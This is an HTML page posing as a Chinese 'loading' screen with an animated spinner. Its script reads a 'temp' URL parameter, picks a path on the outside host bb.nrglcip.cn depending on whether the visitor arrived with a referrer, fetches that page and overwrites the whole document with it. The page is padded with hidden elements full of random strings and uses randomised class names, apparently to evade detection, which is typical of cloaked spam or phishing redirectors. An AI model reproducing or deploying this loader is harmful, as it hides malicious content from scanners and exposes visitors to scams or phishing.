<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .gLZ3cJ5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .gLZ3cJ5 .DflnNEX8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .gLZ3cJ5 .content {
            line-height: 50px;
            text-align: center
        }

        .gLZ3cJ5 .img {
            width: 100%
        }

        .gLZ3cJ5 .rsJ6RVnk {
            text-align: center
        }

        .gLZ3cJ5 .rsJ6RVnk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .gLZ3cJ5 .rsJ6RVnk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .gLZ3cJ5 .rsJ6RVnk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .gLZ3cJ5 .rsJ6RVnk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .gLZ3cJ5 .rsJ6RVnk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .gLZ3cJ5 .rsJ6RVnk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .gLZ3cJ5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yAtr37o0yMHqX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jDY3O = yAtr37o0yMHqX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jDY3O +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jDY3O +".html?a=share";
		}
		
        tsxphSEJ=url+"#"+new Date().getTime();
        tsxphSEJ && function() {
            $.get(tsxphSEJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>END22ulysPD4rL8qz7GIURlcXjyy65El0SaHOGsxRFK3k4sfxCnLLP</p>
<span style='display:none'>HNxrqxdaWaFbmbVTxYRdxUjCMuoi7Xo2JQthhx9MZ0Y6PrJfzlojGEKdY8mH9BopdwuV1LmLpf</span>
<span style='display:none'>HNxrqxdaWaFbmbVTxYRdxUjCMuoi7Xo2JQthhx9MZ0Y6PrJfzlojGEKdY8mH9BopdwuV1LmLpf</span>
<a  href='#' style='display:none'>qxXRpnrjHLUhBHg7Wrt0WiyNxWE1Pi6ducehQY2RLeMjoT3itMmENNcxFE77VX1vOaUqTzwmvLDQW7B5hrFklnId5Nt7lt</a>
<span style='display:none'>HNxrqxdaWaFbmbVTxYRdxUjCMuoi7Xo2JQthhx9MZ0Y6PrJfzlojGEKdY8mH9BopdwuV1LmLpf</span>
<a  href='#' style='display:none'>qxXRpnrjHLUhBHg7Wrt0WiyNxWE1Pi6ducehQY2RLeMjoT3itMmENNcxFE77VX1vOaUqTzwmvLDQW7B5hrFklnId5Nt7lt</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>qxXRpnrjHLUhBHg7Wrt0WiyNxWE1Pi6ducehQY2RLeMjoT3itMmENNcxFE77VX1vOaUqTzwmvLDQW7B5hrFklnId5Nt7lt</a>
<div style='display:none'>ttGLpspbSLiewkfQSrweS</div><div class="gLZ3cJ5">
    <div class="DflnNEX8">
        <div class="rsJ6RVnk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>qQFbxizUJ1aVtxlFGrHMeks80I7</a>
<p  style='display:none'>PnkNDhItqnR5E4JkQWhD5Z2HczpjBcX</p>
<a  href='#' style='display:none'>qQFbxizUJ1aVtxlFGrHMeks80I7</a>
<p  style='display:none'>PnkNDhItqnR5E4JkQWhD5Z2HczpjBcX</p>
<div style='display:none'>rgtgd9qEvi02oCBCmntnchmLGq0uiVT</div>
<span style='display:none'>aB5y7kpM0Tga4jEHfw4dxWvVVYPxrutifF2eJA41e</span></body>
</html>